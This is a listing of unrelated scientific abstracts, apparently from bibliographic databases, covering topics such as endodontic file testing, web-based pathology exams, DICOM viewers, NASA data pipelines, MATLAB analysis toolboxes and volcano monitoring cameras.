This study compared the canal curvature and axis modification after instrumentation with WaveOne Primary reciprocating files (Dentsply Maillefer, Ballaigues, Switzerland) and nickel-titanium (NiTi) rotary ProTaper (Dentsply Maillefer). Thirty ISO 15, 0.02 taper, Endo Training Blocks (Dentsply Maillefer) were used. In all specimens, the glide path was achieved with PathFile 1, 2, and 3 (Dentsply Maillefer) at the working length (WL). Specimens were then assigned to 1 of 2 groups for shaping: specimens in group 1 were shaped with ProTaper S1-S2-F1-F2 at the WL and specimens in group 2 were shaped with WaveOne Primary reciprocating files at the WL. Pre- and postinstrumentation digital images were superimposed and processed with Matlab r2010b (The MathWorks Inc, Natick, MA) software to analyze the curvature-radius ratio (CRr) and the relative axis error (rAe), representing canal curvature modification. Data were analyzed with one-way balanced analyses of variance at 2 levels (P < .05). The instrument factor was extremely significant for both the CRr parameter (F(1) = 9.59, P = .004) and the rAe parameter (F(1) = 13.55, P = .001). Canal modifications are reduced when the new WaveOne NiTi single-file system is used. Copyright © 2012 American Association of Endodontists. Published by Elsevier Inc. All rights reserved.
Web-based pathology practice examination usage.
Klatt, Edward C
2014-01-01
General and subject specific practice examinations for students in health sciences studying pathology were placed onto a free public internet web site entitled web path and were accessed four clicks from the home web site menu. Multiple choice questions were coded into. html files with JavaScript functions for web browser viewing in a timed format. A Perl programming language script with common gateway interface for web page forms scored examinations and placed results into a log file on an internet computer server. The four general review examinations of 30 questions each could be completed in up to 30 min. The 17 subject specific examinations of 10 questions each with accompanying images could be completed in up to 15 min each. The results of scores and user educational field of study from log files were compiled from June 2006 to January 2014. The four general review examinations had 31,639 accesses with completion of all questions, for a completion rate of 54% and average score of 75%. A score of 100% was achieved by 7% of users, ≥90% by 21%, and ≥50% score by 95% of users. In top to bottom web page menu order, review examination usage was 44%, 24%, 17%, and 15% of all accessions. The 17 subject specific examinations had 103,028 completions, with completion rate 73% and average score 74%. Scoring at 100% was 20% overall, ≥90% by 37%, and ≥50% score by 90% of users. The first three menu items on the web page accounted for 12.6%, 10.0%, and 8.2% of all completions, and the bottom three accounted for no more than 2.2% each. Completion rates were higher for shorter 10 questions subject examinations. Users identifying themselves as MD/DO scored higher than other users, averaging 75%. Usage was higher for examinations at the top of the web page menu. Scores achieved suggest that a cohort of serious users fully completing the examinations had sufficient preparation to use them to support their pathology education.
Phased development of a web-based PACS viewer
NASA Astrophysics Data System (ADS)
Gidron, Yoad; Shani, Uri; Shifrin, Mark
2000-05-01
The Web browser is an excellent environment for the rapid development of an effective and inexpensive PACS viewer. In this paper we will share our experience in developing a browser-based viewer, from the inception and prototype stages to its current state of maturity. There are many operational advantages to a browser-based viewer, even when native viewers already exist in the system (with multiple and/or high resolution screens): (1) It can be used on existing personal workstations throughout the hospital. (2) It is easy to make the service available from physician's homes. (3) The viewer is extremely portable and platform independent. There is a wide variety of means available for implementing the browser- based viewer. Each file sent to the client by the server can perform some end-user or client/server interaction. These means range from HTML (for HyperText Markup Language) files, through Java Script, to Java applets. Some data types may also invoke plug-in code in the client, although this would reduce the portability of the viewer, it would provide the needed efficiency in critical places. On the server side the range of means is also very rich: (1) A set of files: html, Java Script, Java applets, etc. (2) Extensions of the server via cgi-bin programs, (3) Extensions of the server via servlets, (4) Any other helper application residing and working with the server to access the DICOM archive. The viewer architecture consists of two basic parts: The first part performs query and navigation through the DICOM archive image folders. The second part does the image access and display. While the first part deals with low data traffic, it involves many database transactions. The second part is simple as far as access transactions are concerned, but requires much more data traffic and display functions. Our web-based viewer has gone through three development stages characterized by the complexity of the means and tools employed on both client and server sides.
dada - a web-based 2D detector analysis tool
NASA Astrophysics Data System (ADS)
Osterhoff, Markus
2017-06-01
The data daemon, dada, is a server backend for unified access to 2D pixel detector image data stored with different detectors, file formats and saved with varying naming conventions and folder structures across instruments. Furthermore, dada implements basic pre-processing and analysis routines from pixel binning over azimuthal integration to raster scan processing. Common user interactions with dada are by a web frontend, but all parameters for an analysis are encoded into a Uniform Resource Identifier (URI) which can also be written by hand or scripts for batch processing.
DSN Beowulf Cluster-Based VLBI Correlator
NASA Technical Reports Server (NTRS)
Rogstad, Stephen P.; Jongeling, Andre P.; Finley, Susan G.; White, Leslie A.; Lanyi, Gabor E.; Clark, John E.; Goodhart, Charles E.
2009-01-01
The NASA Deep Space Network (DSN) requires a broadband VLBI (very long baseline interferometry) correlator to process data routinely taken as part of the VLBI source Catalogue Maintenance and Enhancement task (CAT M&E) and the Time and Earth Motion Precision Observations task (TEMPO). The data provided by these measurements are a crucial ingredient in the formation of precision deep-space navigation models. In addition, a VLBI correlator is needed to provide support for other VLBI related activities for both internal and external customers. The JPL VLBI Correlator (JVC) was designed, developed, and delivered to the DSN as a successor to the legacy Block II Correlator. The JVC is a full-capability VLBI correlator that uses software processes running on multiple computers to cross-correlate two-antenna broadband noise data. Components of this new system (see Figure 1) consist of Linux PCs integrated into a Beowulf Cluster, an existing Mark5 data storage system, a RAID array, an existing software correlator package (SoftC) originally developed for Delta DOR Navigation processing, and various custom- developed software processes and scripts. Parallel processing on the JVC is achieved by assigning slave nodes of the Beowulf cluster to process separate scans in parallel until all scans have been processed. Due to the single stream sequential playback of the Mark5 data, some ramp-up time is required before all nodes can have access to required scan data. Core functions of each processing step are accomplished using optimized C programs. The coordination and execution of these programs across the cluster is accomplished using Pearl scripts, PostgreSQL commands, and a handful of miscellaneous system utilities. Mark5 data modules are loaded on Mark5 Data systems playback units, one per station. Data processing is started when the operator scans the Mark5 systems and runs a script that reads various configuration files and then creates an experiment-dependent status database used to delegate parallel tasks between nodes and storage areas (see Figure 2). This script forks into three processes: extract, translate, and correlate. Each of these processes iterates on available scan data and updates the status database as the work for each scan is completed. The extract process coordinates and monitors the transfer of data from each of the Mark5s to the Beowulf RAID storage systems. The translate process monitors and executes the data conversion processes on available scan files, and writes the translated files to the slave nodes. The correlate process monitors the execution of SoftC correlation processes on the slave nodes for scans that have completed translation. A comparison of the JVC and the legacy Block II correlator outputs reveals they are well within a formal error, and that the data are comparable with respect to their use in flight navigation. The processing speed of the JVC is improved over the Block II correlator by a factor of 4, largely due to the elimination of the reel-to-reel tape drives used in the Block II correlator.
The Kepler Science Operations Center Pipeline Framework Extensions
NASA Technical Reports Server (NTRS)
Klaus, Todd C.; Cote, Miles T.; McCauliff, Sean; Girouard, Forrest R.; Wohler, Bill; Allen, Christopher; Chandrasekaran, Hema; Bryson, Stephen T.; Middour, Christopher; Caldwell, Douglas A.;
2010-01-01
The Kepler Science Operations Center (SOC) is responsible for several aspects of the Kepler Mission, including managing targets, generating on-board data compression tables, monitoring photometer health and status, processing the science data, and exporting the pipeline products to the mission archive. We describe how the generic pipeline framework software developed for Kepler is extended to achieve these goals, including pipeline configurations for processing science data and other support roles, and custom unit of work generators that control how the Kepler data are partitioned and distributed across the computing cluster. We describe the interface between the Java software that manages the retrieval and storage of the data for a given unit of work and the MATLAB algorithms that process these data. The data for each unit of work are packaged into a single file that contains everything needed by the science algorithms, allowing these files to be used to debug and evolve the algorithms offline.
Briel, L.I.
1993-01-01
A computer program was written to produce 6 different types of water-quality diagrams--Piper, Stiff, pie, X-Y, boxplot, and Piper 3-D--from the same file of input data. The Piper 3-D diagram is a new method that projects values from the surface of a Piper plot into a triangular prism to show how variations in chemical composition can be related to variations in other water-quality variables. This program is an analytical tool to aid in the interpretation of data. This program is interactive, and the user can select from a menu the type of diagram to be produced and a large number of individual features. Alternatively, these choices can be specified in the data file, which provides a batch mode for running the program. The program does not display water-quality diagrams directly; plots are written to a file. Four different plot- file formats are available: device-independent metafiles, Adobe PostScript graphics files, and two Hewlett-Packard graphics language formats (7475 and 7586). An ASCII data-table file is also produced to document the computed values. This program is written in Fortran '77 and uses graphics subroutines from either the PRIOR AGTK or the DISSPLA graphics library. The program has been implemented on Prime series 50 and Data General Aviion computers within the USGS; portability to other computing systems depends on the availability of the graphics library.
SU-F-T-476: Performance of the AS1200 EPID for Periodic Photon Quality Assurance
DOE Office of Scientific and Technical Information (OSTI.GOV)
DeMarco, J; Fraass, B; Yang, W
2016-06-15
Purpose: To assess the dosimetric performance of a new amorphous silicon flat-panel electronic portal imaging device (EPID) suitable for high-intensity, flattening-filter-free delivery mode. Methods: An EPID-based QA suite was created with automation to periodically monitor photon central-axis output and two-dimensional beam profile constancy as a function of gantry angle and dose-rate. A Varian TrueBeamTM linear accelerator installed with Developer Mode was used to customize and deliver XML script routines for the QA suite using the dosimetry mode image acquisition for an aS1200 EPID. Automatic post-processing software was developed to analyze the resulting DICOM images. Results: The EPID was used tomore » monitor photon beam output constancy (central-axis), flatness, and symmetry over a period of 10 months for four photon beam energies (6x, 15x, 6xFFF, and 10xFFF). EPID results were consistent to those measured with a standard daily QA check device. At the four cardinal gantry angles, the standard deviation of the EPID central-axis output was <0.5%. Likewise, EPID measurements were independent for the wide range of dose rates (including up to 2400 mu/min for 10xFFF) studied with a standard deviation of <0.8% relative to the nominal dose rate for each energy. Also, profile constancy and field size measurements showed good agreement with the reference acquisition of 0° gantry angle and nominal dose rate. XML script files were also tested for MU linearity and picket-fence delivery. Using Developer Mode, the test suite was delivered in <60 minutes for all 4 photon energies with 4 dose rates per energy and 5 picket-fence acquisitions. Conclusion: Dosimetry image acquisition using a new EPID was found to be accurate for standard and high-intensity photon beams over a broad range of dose rates over 10 months. Developer Mode provided an efficient platform to customize the EPID acquisitions by using custom script files which significantly reduced the time. This work was funded in part by Varian Medical Systems.« less
DATA MANAGEMENT SYSTEM FOR MOBILE SATELLITE PROPAGATION DATA
NASA Technical Reports Server (NTRS)
Kantak, A. V.
1994-01-01
The "Data Management System for Mobile Satellite Propogation" package is a collection of FORTRAN programs and UNIX shell scripts designed to handle the huge amounts of data resulting from Mobile Satellite propogation experiments. These experiments are designed to assist in defining channels for mobile satellite systems. By understanding multipath fading characteristics of the channel, doppler effects, and blockage due to manmade objects as well as natural surroundings, characterization of the channel can be realized. Propogation experiments, then, are performed using a prototype of the system simulating the ultimate product environment. After the data from these experiments is generated, the researcher must access this data with a minimum of effort and to derive some standard results. The programs included in this package manipulate the data files generated by the NASA/JPL Mobile Satellite propogation experiment on an interactive basis. In the experiment, a transmitter operating at 869 MHz was carried to an altitude of 32Km by a stratospheric balloon. A vehicle within the line-of-sight of the transmitter was then driven around, splitting the incoming signal into I and Q channels, and sampling the resulting signal strength at 1000 samples per second. The data was collected at various antenna elavation angles and different times of day generating the ancillary data for the experiment. This package contains a program to convert the binary format of the data generated into standard ASCII format suitable for use with a wide variety of machine architectures. Also included is a UNIX shell-script designed to parse this ASCII file into those records of data that match the researcher's desired values for the ancillary data parameters. In addition, four FORTRAN programs are included to obtain standard quantities from the data. Quantities such as probability of signal level greater than or equal to a specified signal level, probability density of the signal levels, frequency of fade duration, and Fourier Transforms of the sampled data can be generated from the propogation experiment data. All programs in this package are written in either FORTRAN 77 or UNIX shell-scripts. The package does not include test data. The programs were developed in 1987 for use with a UNIX operating system on a DEC MicroVAX computer.
Remote sensing image segmentation based on Hadoop cloud platform
NASA Astrophysics Data System (ADS)
Li, Jie; Zhu, Lingling; Cao, Fubin
2018-01-01
To solve the problem that the remote sensing image segmentation speed is slow and the real-time performance is poor, this paper studies the method of remote sensing image segmentation based on Hadoop platform. On the basis of analyzing the structural characteristics of Hadoop cloud platform and its component MapReduce programming, this paper proposes a method of image segmentation based on the combination of OpenCV and Hadoop cloud platform. Firstly, the MapReduce image processing model of Hadoop cloud platform is designed, the input and output of image are customized and the segmentation method of the data file is rewritten. Then the Mean Shift image segmentation algorithm is implemented. Finally, this paper makes a segmentation experiment on remote sensing image, and uses MATLAB to realize the Mean Shift image segmentation algorithm to compare the same image segmentation experiment. The experimental results show that under the premise of ensuring good effect, the segmentation rate of remote sensing image segmentation based on Hadoop cloud Platform has been greatly improved compared with the single MATLAB image segmentation, and there is a great improvement in the effectiveness of image segmentation.
DPARSF: A MATLAB Toolbox for "Pipeline" Data Analysis of Resting-State fMRI.
Chao-Gan, Yan; Yu-Feng, Zang
2010-01-01
Resting-state functional magnetic resonance imaging (fMRI) has attracted more and more attention because of its effectiveness, simplicity and non-invasiveness in exploration of the intrinsic functional architecture of the human brain. However, user-friendly toolbox for "pipeline" data analysis of resting-state fMRI is still lacking. Based on some functions in Statistical Parametric Mapping (SPM) and Resting-State fMRI Data Analysis Toolkit (REST), we have developed a MATLAB toolbox called Data Processing Assistant for Resting-State fMRI (DPARSF) for "pipeline" data analysis of resting-state fMRI. After the user arranges the Digital Imaging and Communications in Medicine (DICOM) files and click a few buttons to set parameters, DPARSF will then give all the preprocessed (slice timing, realign, normalize, smooth) data and results for functional connectivity, regional homogeneity, amplitude of low-frequency fluctuation (ALFF), and fractional ALFF. DPARSF can also create a report for excluding subjects with excessive head motion and generate a set of pictures for easily checking the effect of normalization. In addition, users can also use DPARSF to extract time courses from regions of interest.
Automatic and efficient methods applied to the binarization of a subway map
NASA Astrophysics Data System (ADS)
Durand, Philippe; Ghorbanzadeh, Dariush; Jaupi, Luan
2015-12-01
The purpose of this paper is the study of efficient methods for image binarization. The objective of the work is the metro maps binarization. the goal is to binarize, avoiding noise to disturb the reading of subway stations. Different methods have been tested. By this way, a method given by Otsu gives particularly interesting results. The difficulty of the binarization is the choice of this threshold in order to reconstruct. Image sticky as possible to reality. Vectorization is a step subsequent to that of the binarization. It is to retrieve the coordinates points containing information and to store them in the two matrices X and Y. Subsequently, these matrices can be exported to a file format 'CSV' (Comma Separated Value) enabling us to deal with them in a variety of software including Excel. The algorithm uses quite a time calculation in Matlab because it is composed of two "for" loops nested. But the "for" loops are poorly supported by Matlab, especially in each other. This therefore penalizes the computation time, but seems the only method to do this.
Automated DICOM metadata and volumetric anatomical information extraction for radiation dosimetry
NASA Astrophysics Data System (ADS)
Papamichail, D.; Ploussi, A.; Kordolaimi, S.; Karavasilis, E.; Papadimitroulas, P.; Syrgiamiotis, V.; Efstathopoulos, E.
2015-09-01
Patient-specific dosimetry calculations based on simulation techniques have as a prerequisite the modeling of the modality system and the creation of voxelized phantoms. This procedure requires the knowledge of scanning parameters and patients’ information included in a DICOM file as well as image segmentation. However, the extraction of this information is complicated and time-consuming. The objective of this study was to develop a simple graphical user interface (GUI) to (i) automatically extract metadata from every slice image of a DICOM file in a single query and (ii) interactively specify the regions of interest (ROI) without explicit access to the radiology information system. The user-friendly application developed in Matlab environment. The user can select a series of DICOM files and manage their text and graphical data. The metadata are automatically formatted and presented to the user as a Microsoft Excel file. The volumetric maps are formed by interactively specifying the ROIs and by assigning a specific value in every ROI. The result is stored in DICOM format, for data and trend analysis. The developed GUI is easy, fast and and constitutes a very useful tool for individualized dosimetry. One of the future goals is to incorporate a remote access to a PACS server functionality.
ALC: automated reduction of rule-based models
Koschorreck, Markus; Gilles, Ernst Dieter
2008-01-01
Background Combinatorial complexity is a challenging problem for the modeling of cellular signal transduction since the association of a few proteins can give rise to an enormous amount of feasible protein complexes. The layer-based approach is an approximative, but accurate method for the mathematical modeling of signaling systems with inherent combinatorial complexity. The number of variables in the simulation equations is highly reduced and the resulting dynamic models show a pronounced modularity. Layer-based modeling allows for the modeling of systems not accessible previously. Results ALC (Automated Layer Construction) is a computer program that highly simplifies the building of reduced modular models, according to the layer-based approach. The model is defined using a simple but powerful rule-based syntax that supports the concepts of modularity and macrostates. ALC performs consistency checks on the model definition and provides the model output in different formats (C MEX, MATLAB, Mathematica and SBML) as ready-to-run simulation files. ALC also provides additional documentation files that simplify the publication or presentation of the models. The tool can be used offline or via a form on the ALC website. Conclusion ALC allows for a simple rule-based generation of layer-based reduced models. The model files are given in different formats as ready-to-run simulation files. PMID:18973705
Calderon, Karynna; Dadisman, Shawn V.; Tihansky, Ann B.; Lewelling, Bill R.; Flocks, James G.; Wiese, Dana S.; Kindinger, Jack G.; Harrison, Arnell S.
2006-01-01
In October and November of 1995 and February of 1996, the U.S. Geological Survey, in cooperation with the Southwest Florida Water Management District, conducted geophysical surveys of the Peace River in west-central Florida from east of Bartow to west of Arcadia. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS files, Field Activity Collection System (FACS) logs, observers' logbooks, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. Refer to the Acronyms page for expansion of acronyms and abbreviations used in this report. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
On the optical path length in refracting media
NASA Astrophysics Data System (ADS)
Hasbun, Javier E.
2018-04-01
The path light follows as it travels through a substance depends on the substance's index of refraction. This path is commonly known as the optical path length (OPL). In geometrical optics, the laws of reflection and refraction are simple examples for understanding the path of light travel from source to detector for constant values of the traveled substances' refraction indices. In more complicated situations, the Euler equation can be quite useful and quite important in optics courses. Here, the well-known Euler differential equation (EDE) is used to obtain the OPL for several index of refraction models. For pedagogical completeness, the OPL is also obtained through a modified Monte Carlo (MC) method, versus which the various results obtained through the EDE are compared. The examples developed should be important in projects involving undergraduate as well as graduate students in an introductory optics course. A simple matlab script (program) is included that can be modified by students who wish to pursue the subject further.
PYCHEM: a multivariate analysis package for python.
Jarvis, Roger M; Broadhurst, David; Johnson, Helen; O'Boyle, Noel M; Goodacre, Royston
2006-10-15
We have implemented a multivariate statistical analysis toolbox, with an optional standalone graphical user interface (GUI), using the Python scripting language. This is a free and open source project that addresses the need for a multivariate analysis toolbox in Python. Although the functionality provided does not cover the full range of multivariate tools that are available, it has a broad complement of methods that are widely used in the biological sciences. In contrast to tools like MATLAB, PyChem 2.0.0 is easily accessible and free, allows for rapid extension using a range of Python modules and is part of the growing amount of complementary and interoperable scientific software in Python based upon SciPy. One of the attractions of PyChem is that it is an open source project and so there is an opportunity, through collaboration, to increase the scope of the software and to continually evolve a user-friendly platform that has applicability across a wide range of analytical and post-genomic disciplines. http://sourceforge.net/projects/pychem
NASA Astrophysics Data System (ADS)
Mishra, Aanand Kumar; Singh, Ajay; Bahadur Singh, Akal
2018-06-01
High rise arc dams are widely used in the development of storage type hydropower project because of the economic advantage. Among different phases considered during the lifetime of dam, control of dam’s safety and performance becomes more concerned during the lifetime. This paper proposed the 3 – D finite element method (FEM) for stress and deformation analysis of double curvature arc dam considering the non – linearity of foundation rock following the Hoek – Brown Criterion. The proposed methodology is implemented through MATLAB scripting language and studied the double curvature arc dam proposed for Budhi Gandaki hydropower project. The stress developed in the foundation rock, compressive and tensile stress acting on the dam are investigated and analysed for the reservoir level variation. Deformation at the top of the dam and in the foundation rock is also investigated. In addition to that, stress and deformation variation in the foundation rock is analysed for various rock properties.
Securing Color Fidelity in 3D Architectural Heritage Scenarios.
Gaiani, Marco; Apollonio, Fabrizio Ivan; Ballabeni, Andrea; Remondino, Fabio
2017-10-25
Ensuring color fidelity in image-based 3D modeling of heritage scenarios is nowadays still an open research matter. Image colors are important during the data processing as they affect algorithm outcomes, therefore their correct treatment, reduction and enhancement is fundamental. In this contribution, we present an automated solution developed to improve the radiometric quality of an image datasets and the performances of two main steps of the photogrammetric pipeline (camera orientation and dense image matching). The suggested solution aims to achieve a robust automatic color balance and exposure equalization, stability of the RGB-to-gray image conversion and faithful color appearance of a digitized artifact. The innovative aspects of the article are: complete automation, better color target detection, a MATLAB implementation of the ACR scripts created by Fraser and the use of a specific weighted polynomial regression. A series of tests are presented to demonstrate the efficiency of the developed methodology and to evaluate color accuracy ('color characterization').
Revisiting Hansen Solubility Parameters by Including Thermodynamics.
Louwerse, Manuel J; Maldonado, Ana; Rousseau, Simon; Moreau-Masselon, Chloe; Roux, Bernard; Rothenberg, Gadi
2017-11-03
The Hansen solubility parameter approach is revisited by implementing the thermodynamics of dissolution and mixing. Hansen's pragmatic approach has earned its spurs in predicting solvents for polymer solutions, but for molecular solutes improvements are needed. By going into the details of entropy and enthalpy, several corrections are suggested that make the methodology thermodynamically sound without losing its ease of use. The most important corrections include accounting for the solvent molecules' size, the destruction of the solid's crystal structure, and the specificity of hydrogen-bonding interactions, as well as opportunities to predict the solubility at extrapolated temperatures. Testing the original and the improved methods on a large industrial dataset including solvent blends, fit qualities improved from 0.89 to 0.97 and the percentage of correct predictions rose from 54 % to 78 %. Full Matlab scripts are included in the Supporting Information, allowing readers to implement these improvements on their own datasets. © 2017 Wiley-VCH Verlag GmbH & Co. KGaA, Weinheim.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Rodriguez, Sal
2017-08-24
The code (aka computer program written as a Matlab script) uses a unique set of n independent equations to solve for n turbulence variables. The code requires the input of a characteristic dimension, a characteristic fluid velocity, the fluid dynamic viscosity, and the fluid density. Most importantly, the code estimates the size of three key turbulent eddies: Kolmogorov, Taylor, and integral. Based on the eddy sizes, dimples dimensions are prescribed such that the key eddies (principally Taylor, and sometimes Kolmogorov), can be generated by the dimple rim and flow unimpeded through the dimple’s concave cavity. It is hypothesized that turbulentmore » eddies are generated by the dimple rim at the dimple-surface interface. The newly-generated eddies in turn entrain the movement of surrounding regions of fluid, creating more mixing. The eddies also generate lift near the wall surrounding the dimple, as they accelerate and reduce pressure in the regions near and at the dimple cavity, thereby minimizing the fluid drag.« less
Securing Color Fidelity in 3D Architectural Heritage Scenarios
Apollonio, Fabrizio Ivan; Ballabeni, Andrea; Remondino, Fabio
2017-01-01
Ensuring color fidelity in image-based 3D modeling of heritage scenarios is nowadays still an open research matter. Image colors are important during the data processing as they affect algorithm outcomes, therefore their correct treatment, reduction and enhancement is fundamental. In this contribution, we present an automated solution developed to improve the radiometric quality of an image datasets and the performances of two main steps of the photogrammetric pipeline (camera orientation and dense image matching). The suggested solution aims to achieve a robust automatic color balance and exposure equalization, stability of the RGB-to-gray image conversion and faithful color appearance of a digitized artifact. The innovative aspects of the article are: complete automation, better color target detection, a MATLAB implementation of the ACR scripts created by Fraser and the use of a specific weighted polynomial regression. A series of tests are presented to demonstrate the efficiency of the developed methodology and to evaluate color accuracy (‘color characterization’). PMID:29068359
Detrended Fluctuation Analysis: A Scale-Free View on Neuronal Oscillations
Hardstone, Richard; Poil, Simon-Shlomo; Schiavone, Giuseppina; Jansen, Rick; Nikulin, Vadim V.; Mansvelder, Huibert D.; Linkenkaer-Hansen, Klaus
2012-01-01
Recent years of research have shown that the complex temporal structure of ongoing oscillations is scale-free and characterized by long-range temporal correlations. Detrended fluctuation analysis (DFA) has proven particularly useful, revealing that genetic variation, normal development, or disease can lead to differences in the scale-free amplitude modulation of oscillations. Furthermore, amplitude dynamics is remarkably independent of the time-averaged oscillation power, indicating that the DFA provides unique insights into the functional organization of neuronal systems. To facilitate understanding and encourage wider use of scaling analysis of neuronal oscillations, we provide a pedagogical explanation of the DFA algorithm and its underlying theory. Practical advice on applying DFA to oscillations is supported by MATLAB scripts from the Neurophysiological Biomarker Toolbox (NBT) and links to the NBT tutorial website http://www.nbtwiki.net/. Finally, we provide a brief overview of insights derived from the application of DFA to ongoing oscillations in health and disease, and discuss the putative relevance of criticality for understanding the mechanism underlying scale-free modulation of oscillations. PMID:23226132
Frömer, Romy; Maier, Martin; Abdel Rahman, Rasha
2018-01-01
Here we present an application of an EEG processing pipeline customizing EEGLAB and FieldTrip functions, specifically optimized to flexibly analyze EEG data based on single trial information. The key component of our approach is to create a comprehensive 3-D EEG data structure including all trials and all participants maintaining the original order of recording. This allows straightforward access to subsets of the data based on any information available in a behavioral data structure matched with the EEG data (experimental conditions, but also performance indicators, such accuracy or RTs of single trials). In the present study we exploit this structure to compute linear mixed models (LMMs, using lmer in R) including random intercepts and slopes for items. This information can easily be read out from the matched behavioral data, whereas it might not be accessible in traditional ERP approaches without substantial effort. We further provide easily adaptable scripts for performing cluster-based permutation tests (as implemented in FieldTrip), as a more robust alternative to traditional omnibus ANOVAs. Our approach is particularly advantageous for data with parametric within-subject covariates (e.g., performance) and/or multiple complex stimuli (such as words, faces or objects) that vary in features affecting cognitive processes and ERPs (such as word frequency, salience or familiarity), which are sometimes hard to control experimentally or might themselves constitute variables of interest. The present dataset was recorded from 40 participants who performed a visual search task on previously unfamiliar objects, presented either visually intact or blurred. MATLAB as well as R scripts are provided that can be adapted to different datasets.
Recent improvements in monitoring Hawaiian volcanoes with webcams and thermal cameras
NASA Astrophysics Data System (ADS)
Patrick, M. R.; Orr, T. R.; Antolik, L.; Lee, R.; Kamibayashi, K.
2012-12-01
Webcams have become essential tools for continuous observation of ongoing volcanic activity. The use of both visual webcams and Web-connected thermal cameras has increased dramatically at the Hawaiian Volcano Observatory over the past five years, improving our monitoring capability and understanding of both Kilauea's summit eruption, which began in 2008, and the east rift zone eruption, which began in 1983. The recent bolstering of the webcam network builds upon the three sub-megapixel webcams that were in place five years ago. First, several additional fixed visual webcam systems have been installed, using multi-megapixel low-light cameras. Second, several continuously operating thermal cameras have been deployed, providing a new view of activity, easier detection of active flows, and often "seeing" through fume that completely obscures views from visual webcams. Third, a new type of "mobile" webcam - using cellular modem telemetry and capable of rapid deployment - has allowed us to respond quickly to changes in eruptive activity. Fourth, development of automated analysis and alerting scripts provide real-time products that aid in quantitative interpretation of incoming images. Finally, improvements in the archiving and Web-based display of images allow efficient review of current and recent images by observatory staff. Examples from Kilauea's summit and lava flow field provide more detail on the improvements. A thermal camera situated at Kilauea's summit has tracked the changes in the active lava lake in Halema`uma`u Crater since late 2010. Automated measurements from these images using Matlab scripts are now providing real-time quantitative data on lava level and, in some cases, lava crust velocity. Lava level essentially follows summit tilt over short time scales, in which near-daily cycles of deflation and inflation correspond with about ten meters of lava level drop and rise, respectively. The data also show that the long-term Halema`uma`u lava level tracked by the thermal cameras also correlates with the pressure state of the summit magma reservoir over months based on deformation data. Comparing the summit lava level with that in Pu`u `O`o crater, about 20 km distant on the east rift zone, reveals a clear correlation that reaffirms the hydraulic connection from summit to rift zone. Elsewhere on Kilauea, mobile webcams deployed on the coastal plain have improved the tracking of active breakouts from the east rift zone eruption site - a critical hazard zone given that four homes, mostly in the Kalapana area, have been destroyed by lava flows in the last three years. Each morning an automated Matlab script detects incandescent areas in overnight images and, using the known image geometry, determines the azimuth to active flows. The results of this eruptive "breakout locator" are emailed to observatory staff each morning and provide a quantitative constraint on breakout locations and hazard potential that serves as a valuable addition to routine field mapping. These examples show the utility of webcams and thermal cameras for monitoring volcanic activity, and they reinforce the importance of continued development of equipment as well as real-time processing and analysis tools.
SMASH - semi-automatic muscle analysis using segmentation of histology: a MATLAB application.
Smith, Lucas R; Barton, Elisabeth R
2014-01-01
Histological assessment of skeletal muscle tissue is commonly applied to many areas of skeletal muscle physiological research. Histological parameters including fiber distribution, fiber type, centrally nucleated fibers, and capillary density are all frequently quantified measures of skeletal muscle. These parameters reflect functional properties of muscle and undergo adaptation in many muscle diseases and injuries. While standard operating procedures have been developed to guide analysis of many of these parameters, the software to freely, efficiently, and consistently analyze them is not readily available. In order to provide this service to the muscle research community we developed an open source MATLAB script to analyze immunofluorescent muscle sections incorporating user controls for muscle histological analysis. The software consists of multiple functions designed to provide tools for the analysis selected. Initial segmentation and fiber filter functions segment the image and remove non-fiber elements based on user-defined parameters to create a fiber mask. Establishing parameters set by the user, the software outputs data on fiber size and type, centrally nucleated fibers, and other structures. These functions were evaluated on stained soleus muscle sections from 1-year-old wild-type and mdx mice, a model of Duchenne muscular dystrophy. In accordance with previously published data, fiber size was not different between groups, but mdx muscles had much higher fiber size variability. The mdx muscle had a significantly greater proportion of type I fibers, but type I fibers did not change in size relative to type II fibers. Centrally nucleated fibers were highly prevalent in mdx muscle and were significantly larger than peripherally nucleated fibers. The MATLAB code described and provided along with this manuscript is designed for image processing of skeletal muscle immunofluorescent histological sections. The program allows for semi-automated fiber detection along with user correction. The output of the code provides data in accordance with established standards of practice. The results of the program have been validated using a small set of wild-type and mdx muscle sections. This program is the first freely available and open source image processing program designed to automate analysis of skeletal muscle histological sections.
SU-E-T-473: A Patient-Specific QC Paradigm Based On Trajectory Log Files and DICOM Plan Files
DOE Office of Scientific and Technical Information (OSTI.GOV)
DeMarco, J; McCloskey, S; Low, D
Purpose: To evaluate a remote QC tool for monitoring treatment machine parameters and treatment workflow. Methods: The Varian TrueBeamTM linear accelerator is a digital machine that records machine axis parameters and MLC leaf positions as a function of delivered monitor unit or control point. This information is saved to a binary trajectory log file for every treatment or imaging field in the patient treatment session. A MATLAB analysis routine was developed to parse the trajectory log files for a given patient, compare the expected versus actual machine and MLC positions as well as perform a cross-comparison with the DICOM-RT planmore » file exported from the treatment planning system. The parsing routine sorts the trajectory log files based on the time and date stamp and generates a sequential report file listing treatment parameters and provides a match relative to the DICOM-RT plan file. Results: The trajectory log parsing-routine was compared against a standard record and verify listing for patients undergoing initial IMRT dosimetry verification and weekly and final chart QC. The complete treatment course was independently verified for 10 patients of varying treatment site and a total of 1267 treatment fields were evaluated including pre-treatment imaging fields where applicable. In the context of IMRT plan verification, eight prostate SBRT plans with 4-arcs per plan were evaluated based on expected versus actual machine axis parameters. The average value for the maximum RMS MLC error was 0.067±0.001mm and 0.066±0.002mm for leaf bank A and B respectively. Conclusion: A real-time QC analysis program was tested using trajectory log files and DICOM-RT plan files. The parsing routine is efficient and able to evaluate all relevant machine axis parameters during a patient treatment course including MLC leaf positions and table positions at time of image acquisition and during treatment.« less
User-Friendly Data Servers for Climate Studies at the Asia-Pacific Data-Research Center (APDRC)
NASA Astrophysics Data System (ADS)
Yuan, G.; Shen, Y.; Zhang, Y.; Merrill, R.; Waseda, T.; Mitsudera, H.; Hacker, P.
2002-12-01
